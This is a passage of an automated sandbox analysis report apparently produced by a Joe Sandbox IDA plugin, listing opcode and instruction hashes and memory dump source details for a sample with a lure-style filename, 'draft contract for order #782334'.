                                                                                                                        • Opcode ID: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
                                                                                                                        • Instruction ID: e2587b46b9027b34d9675717590d8bb956bff48774ddfd63f0cd771740c9835e
                                                                                                                        • Opcode Fuzzy Hash: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
                                                                                                                        • Instruction Fuzzy Hash: 9F216835A00206DFCB15CF98C580AAAFBF6FF88318F2441ADD105AB354CB71AD06CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
                                                                                                                        • Instruction ID: 519377f183e67e008f6ce3bddadc9c78c0ae36e3cb5caf69d70fcedf778c0711
                                                                                                                        • Opcode Fuzzy Hash: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
                                                                                                                        • Instruction Fuzzy Hash: EF215C75600A01EFD7219F69C881B66F7F8FF84650F44882DF5AAC7252EB70E950CBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
                                                                                                                        • Instruction ID: a6417cec0ee7762771cbd231139196967c5814e45b9e6630d6d18d38b69b3ada
                                                                                                                        • Opcode Fuzzy Hash: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
                                                                                                                        • Instruction Fuzzy Hash: BB11C132240514EBCB22DB5DE940F9AFBA8EB99A60F114129F2019B251DA70E809C790
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
                                                                                                                        • Instruction ID: 45bc4d14012fb721a2b52a8d3ef662931c6dfc312d2ee063cd762639567071d6
                                                                                                                        • Opcode Fuzzy Hash: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
                                                                                                                        • Instruction Fuzzy Hash: F11108333041249FCB19DB29DC95A6BF25AEFD5370B254539EA228B395ED309802C391
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
                                                                                                                        • Instruction ID: 660e852266356b4d952d56cf7eaef0efa722a73c09eb67f4c2f3efeb6d811b05
                                                                                                                        • Opcode Fuzzy Hash: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
                                                                                                                        • Instruction Fuzzy Hash: 7011BF76A01205EBCB26DF59C580A5AFBE5EBC4650B518079E9059B316E630DE00CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                        • Instruction ID: 1eef5b761b4679f8930a04d62a27094183a4286716d9e9f0c52d928bf63378d1
                                                                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                        • Instruction Fuzzy Hash: D8110436A00909AFDB19CB58C845B9DFBB5EF84710F05826DE84597344E631BE41CB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                        • Instruction ID: 65fc7179ac838f9f0f8db4054171bb5b9dac7d10f03f24145475155999845ce2
                                                                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                        • Instruction Fuzzy Hash: 8C2106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                        • Instruction ID: faf975da205d00c1fd6dd3b0f36308f3a3c4eb4a26c3db1672da744c81a62b05
                                                                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                        • Instruction Fuzzy Hash: C811A0326D0601EFE721AF49C848B5EFBE5EF45754F059428EA099B260DF71DC40DB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                        • Instruction ID: c0b170e8ee045eed2efedda403a4a1bae8e9490620533c60cd29d47f7a1be958
                                                                                                                        • Opcode Fuzzy Hash: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                        • Instruction Fuzzy Hash: 6E014931745685AFE316A66EDC48F27FB8CEF90390F0500B5FD009B296DA54DC01C271
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                        • Instruction ID: cca00b15c86cd606229ca11550e41065146dc7b054c2fd7b14d89451c839b635
                                                                                                                        • Opcode Fuzzy Hash: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                        • Instruction Fuzzy Hash: 4711A036600745EFDB27CF5DD944B56BBE8EB86764F005119FA068B690C770E800CF60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                        • Instruction ID: 312e1d4d84b878de25ba4905e9eb24e115d72aadfb9bf6f5c71552289956f4e9
                                                                                                                        • Opcode Fuzzy Hash: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                        • Instruction Fuzzy Hash: 3E11C2362006199FD7229B6DD844F67F7B6FFD4720F194429EA8787A94DA30A802CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                        • Instruction ID: 6ead4c3d4cc822fcc186ec53b81fb78956d4995d65eb0771bd791df9f077ff45
                                                                                                                        • Opcode Fuzzy Hash: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                        • Instruction Fuzzy Hash: B1118272A00715FBDB22DF59C984B5EFBB8FF84790F510459EA01A7245D730AE019B60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                        • Instruction ID: f6d62f2e7707a9bba2c4763c8daed040a51fec3c01dc22b0ee581887c0348749
                                                                                                                        • Opcode Fuzzy Hash: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                        • Instruction Fuzzy Hash: C4019E7150120A9FC725DF19D448F26FBF9EB85324F21816EE2058B2A8CB70AD82CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                        • Instruction ID: 35e54029b00838ee43cf05dbbc7f0aafdd3c82125fbf8118db311e470639d43b
                                                                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                        • Instruction Fuzzy Hash: EA110C712116D19BE723972DD968F25F7D8FF01754F1900E0DD41C7642F728C982C650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                        • Instruction ID: c8a28e996fd46f0966e681a1791f1d1a0e5cb9205ff0c77926077d404b98d63f
                                                                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                        • Instruction Fuzzy Hash: 33019236640205EFE725BF58CC08F5AFBA9EB95760F058474EA059B264EB71DD80C790
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction ID: a73b6e0ceeae27a3068a9400c6c1adf3fb0bb37b66932eefced177091554f87a
                                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction Fuzzy Hash: EA012635604B219BCB318F99EC40A327BA4EF55770704C62DFE998B281C731D401CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                        • Instruction ID: eece90d06cd5b907cd939ff715d347b8dfbdfb04b7f5afeda73ebe393426707a
                                                                                                                        • Opcode Fuzzy Hash: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                        • Instruction Fuzzy Hash: 120145335412059FC332DF1EC844E12FBB8EB81770B254265E9AA9B5AAE730EC01CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                        • Instruction ID: 35df96cc259612313d1af53a4f382ce2ec42940904ae87bad46a781c982b4bb2
                                                                                                                        • Opcode Fuzzy Hash: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                        • Instruction Fuzzy Hash: 5211CB32241601EFCB26AF09C880F06BBB8FF58B44F2000A8EA058B6A1C631ED01CA90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                        • Instruction ID: 6f7c75bc1a0d11d42ef2685a7998a6657fa8432e817fa6834c045231f8cd6ed3
                                                                                                                        • Opcode Fuzzy Hash: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                        • Instruction Fuzzy Hash: DE119A70641229ABDB26EF24CC56FE9B3B4AF04720F5041D4B318A60E5EB309E91CF84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                        • Instruction ID: 99b660a1ae438a3fe193cb3d138b3918e186e86c69de24a3b057d66003f2526c
                                                                                                                        • Opcode Fuzzy Hash: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                        • Instruction Fuzzy Hash: BB111776900019BBCB16EB94CC84EDFBB7DEF48254F044166A906E7211EA34AA55CBE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction ID: 460c8f8bcd715e79abea9c1efeedec6c980f266c6fffe6c71da83181a7476328
                                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction Fuzzy Hash: EF01F533200310CBDF52CA2DD888A52F7ABBFC4610F5544A5ED458F29BDAB1C881C3A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                        • Instruction ID: 026ba98c6c26508fb022e9b0c12688bfe7abe1b8e5c2b88edc62304ceccd665d
                                                                                                                        • Opcode Fuzzy Hash: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                        • Instruction Fuzzy Hash: C311E5726001459FC701CF18E400BA2FBB5FB5A314F188259F8448B315D731EC84CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                        • Instruction ID: 2359c43f7abcd868d2b6fe4401b95d1d5dee215014c13ee12a98092c576784aa
                                                                                                                        • Opcode Fuzzy Hash: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                        • Instruction Fuzzy Hash: 9E1118B1A102099FCB00DFA9D545AAEFBF8FF58250F10806AA905E7355D674EA018BA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                        • Instruction ID: 7ed7d3beeeeb24908fd659ce8eae808a3f89190dfc8037297915bb170ae15b82
                                                                                                                        • Opcode Fuzzy Hash: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                        • Instruction Fuzzy Hash: CA0124311402119BCB32AF298494D37FBBAFFD16A0BA4446EF2110B215CF30EE81CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction ID: ce31bef99e60d8c210d65c3b518c43c42512d722a1590ee486167d415e07bb73
                                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction Fuzzy Hash: D60128321007099FEB3296ADC804EA7F7E9FFC5214F14481DEA468B544DBB1E443C760
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
                                                                                                                        • Instruction ID: bb66d60d162dc3bd299b4ca15a567c995fdf2a8ccd4b8b3aaf77043c7958bfe0
                                                                                                                        • Opcode Fuzzy Hash: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
                                                                                                                        • Instruction Fuzzy Hash: 1E116D35A0120DAFDF05EFA4D854FAEBBB5EB44250F004099F90297254E735AE11CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                        • Instruction ID: b4412a2445a6bbaa72174215b9ad5f0d8161da46926c5645e6df31d27af86e32
                                                                                                                        • Opcode Fuzzy Hash: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                        • Instruction Fuzzy Hash: 1A018936100149ABCF12AE84D840EDA7F66FB4C664F058116FE1866224C332D9B0EB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                        • Instruction ID: 31b73c4db135c3d7b23338d4de90435a68e48c6858999142747bb58fed4b1589
                                                                                                                        • Opcode Fuzzy Hash: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                        • Instruction Fuzzy Hash: 86F024726042495BF354DA1D8C02F23329AE7D0696FA5806EEB058B3C1EF71DC1283A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                        • Instruction ID: 73cf9a47e2c8b145a7eb3f894fa6fe0618934c9c98cc488b6cbe50a5333b8290
                                                                                                                        • Opcode Fuzzy Hash: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                        • Instruction Fuzzy Hash: AE01A470301681ABE7229B2CCD4CF25BBE4BB80B14F5841A4BA019B6DBD728D541C220
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction ID: ac8e2bd7dba67c94de5246563d6f4fc9bfe3c536439dff5f61264cd616cb40c7
                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction Fuzzy Hash: 06F0E93534191347EB35AA2E8424B2EEA559FD0A01B4D472D9603EB644DFA1D8058790
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                        • Instruction ID: de8f51ccfb9caabe7a984b457dac0bf8a80a2489880a545ef30a013a6fa5e0f8
                                                                                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                        • Instruction Fuzzy Hash: 25F082337E56229BE331AE4ECC80F1AF7A8EFD5A60F191475A6149B264CB60EC41C7D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                        • Instruction ID: 85e0d51f55ec4d9011eb6944c06f71e40d6fffd7aa350a5c9acb2cbc2df5ecb1
